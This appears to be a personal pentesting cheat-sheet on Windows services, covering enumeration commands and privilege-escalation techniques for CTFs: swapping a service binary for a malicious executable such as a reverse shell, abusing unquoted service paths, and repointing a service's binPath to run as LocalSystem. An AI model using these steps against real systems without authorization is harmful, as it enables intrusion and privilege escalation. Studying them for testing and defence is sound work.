Windows services
You can learn more about Windows services here.
- πΊοΈ List services
PS> Get-Service
PS> net start
PS> sc.exe query # with infos
- π Get more info about a service
PS> sc.exe qc xxx
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: xxx
[...]
BINARY_PATH_NAME : C:\[...]\service.exe
[...]
π₯ In CTFs, you may be able to start/stop the service manually
PS> sc.exe stop xxx
PS> # do your job
PS> sc.exe start xxx
π Notable services: vss
, Spooler
, wuauserv
, etc.
β‘οΈ See also: Potatoes π₯ and SweetPotato (1.2k β).
β‘οΈ PrintNightmare (CVE-2021-1675) vulnerability in Spooler service.
β‘οΈ Users in group Server Operators
can start/stop some services. They can also edit some services, such as to replace the binary path.
Pentester Notes β οΈ
Insecure permissions
The current user may be able to replace the service with a malicious executable (ex: revshell.exe)
PS> icacls C:\[...]\service.exe
PS> move C:\[...]\service.exe C:\[...]\service.exe.old
PS> icacls C:\[...]\malicious.exe /grant Everyone:F
Unquoted Service Path
If the service is using a PATH in which there are spaces, the service isn't quoted, and the hacker can create files, then the hacker may create an executable that is executed with the rest of the path in argument.
PS> icacls $Env:appdata\Vulnerable Program\service.exe
PS> move C:\[...]\malicious.exe $Env:appdata\Vulnerable.exe
PS> # the service will execute
PS> # $Env:appdata\Vulnerable.exe Program\service.exe
Insecure Service Permissions
It occurs if we can edit the permissions of a service, such as being able to change the location of the binary. Use the accesschk command. If the user is granted SERVICE_ALL_ACCESS
on the service, then have fun.
PS> # LocalSystem is the highest privileged account available
PS> sc.exe config xxx binPath=C:\[...]\malicious.exe obj= LocalSystem
π» To-do π»
Stuff that I found, but never read/used yet.
- It's recommended to use service accounts for services.
- Most services run with LocalSystem privileges by default
- From the SCM, we can configure an application to be executed if a service fails. If one was configured, it can be exploited.